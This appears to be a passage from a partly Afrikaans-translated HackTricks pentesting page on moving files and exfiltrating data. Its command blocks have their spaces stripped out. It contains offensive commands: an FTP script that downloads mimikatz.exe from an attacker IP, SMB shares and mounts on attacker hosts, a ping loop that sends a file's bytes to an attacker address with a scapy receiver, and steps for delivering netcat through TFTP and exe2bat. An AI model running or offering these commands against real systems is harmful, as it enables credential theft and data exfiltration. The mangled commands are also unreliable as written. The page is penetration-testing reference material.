#Run the following script to configure the FTP server#!/bin/bashgroupaddftpgroupuseradd-gftpgroup-d/dev/null-s/etcftpuserpure-pwduseraddfusr-uftpuser-d/ftphomepure-pwmkdbcd/etc/pure-ftpd/auth/ln-s../conf/PureDB60pdbmkdir-p/ftphomechown-Rftpuser:ftpgroup/ftphome//etc/init.d/pure-ftpdrestart
Windows kliënt
#Work well with python. With pure-ftp use fusr:ftpechoopen10.11.0.4121>ftp.txtechoUSERanonymous>>ftp.txtechoanonymous>>ftp.txtechobin>>ftp.txtechoGETmimikatz.exe>>ftp.txtechobye>>ftp.txtftp-n-v-s:ftp.txt
SMB
Kali as bediener
kali_op1>impacket-smbserver-smb2supportkali`pwd`# Share current directorykali_op2>smbserver.py-smb2supportname/path/folder# Share a folder#For new Win10 versionsimpacket-smbserver-smb2support-usertest-passwordtesttest`pwd`
Of skep 'n smb-deel met behulp van samba:
apt-getinstallsambamkdir/tmp/smbchmod777/tmp/smb#Add to the end of /etc/samba/smb.conf this:[public]comment=SambaonUbuntupath=/tmp/smbreadonly=nobrowsable=yesguestok=Yes#Start sambaservicesmbdrestart
Exfiltration
Exfiltration is the unauthorized transfer of data from a target system. Once an attacker gains access to a system, they need to find a way to exfiltrate the data they are after. There are various methods to exfiltrate data from a compromised system, including:
Email: Attackers can send sensitive data as email attachments to external email accounts.
FTP: File Transfer Protocol can be used to transfer files from the compromised system to an external server controlled by the attacker.
DNS: Attackers can encode sensitive data into DNS queries and exfiltrate it through DNS requests.
Web: Data can be exfiltrated by encoding it into web requests or by uploading it to a web server.
Cloud Storage: Attackers can use cloud storage services to store and exfiltrate data from the compromised system.
It is essential for organizations to monitor and control outbound network traffic to detect and prevent data exfiltration attempts.
CMD-Wind> \\10.10.14.14\path\to\exeCMD-Wind>netusez: \\10.10.14.14\test/user:testtest#For SMB using credentialsWindPS-1>New-PSDrive-Name"new_disk"-PSProvider"FileSystem"-Root"\\10.10.14.9\kali"WindPS-2>cdnew_disk:
Netcat is a versatile networking utility that can be used for reading from and writing to network connections using TCP or UDP. It can be used to transfer files, port scanning, banner grabbing, and as a backdoor. Netcat can be used as a simple chat client as well.
# To exfiltrate the content of a file via pings you can do:xxd-p-c4/path/file/exfil|whilereadline; doping-c1-p $line <IPattacker>; done#This will 4bytes per ping packet (you could probably increase this until 16)
from scapy.all import*#This is ippsec receiver created in the HTB machine Mischiefdefprocess_packet(pkt):if pkt.haslayer(ICMP):if pkt[ICMP].type ==0:data = pkt[ICMP].load[-4:]#Read the 4bytes interestingprint(f"{data.decode('utf-8')}", flush=True, end="")sniff(iface="tun0", prn=process_packet)
SMTP
As jy data na 'n SMTP-bediener kan stuur, kan jy 'n SMTP skep om die data met Python te ontvang:
sudopython-msmtpd-n-cDebuggingServer:25
TFTP
Standaard in XP en 2003 (in ander moet dit uitdruklik tydens installasie bygevoeg word)
In Kali, begin TFTP-bediener:
#I didn't get this options working and I prefer the python optionmkdir/tftpatftpd--daemon--port69/tftpcp/path/tp/nc.exe/tftp
VBScript is 'n skripsie taal wat deur Microsoft ontwikkel is en dikwels gebruik word vir Windows-gebaseerde skripsies en automatiseringstake. VBScript kan gebruik word vir die uitvoer van data exfiltration deur die gebruik van HTTP-aanvrae na 'n eksterne bediener. Hierdie tegniek kan gebruik word om gesteelde data van 'n geteikenrekenaar na 'n aanvaller se bediener te stuur.
Die debug.exe program maak dit nie net moontlik om binêre lêers te inspekteer nie, maar het ook die vermoë om hulle vanaf heks te herbou. Dit beteken dat deur 'n heks van 'n binêre lêer te voorsien, debug.exe die binêre lêer kan genereer. Dit is egter belangrik om daarop te let dat debug.exe 'n beperking het om lêers tot 64 kb in grootte saam te stel.
# Reduce the sizeupx-9nc.exewineexe2bat.exenc.exenc.txt
Dan kopieer en plak die teks in die Windows-skootrekenaar en 'n lêer genaamd nc.exe sal geskep word.* [https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html](https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html)
## DNS* [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)**Try Hard Security Group**<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
<div data-gb-custom-block data-tag="embed" data-url='https://discord.gg/tryhardsecurity'></div><details><summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Ander maniere om HackTricks te ondersteun:* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>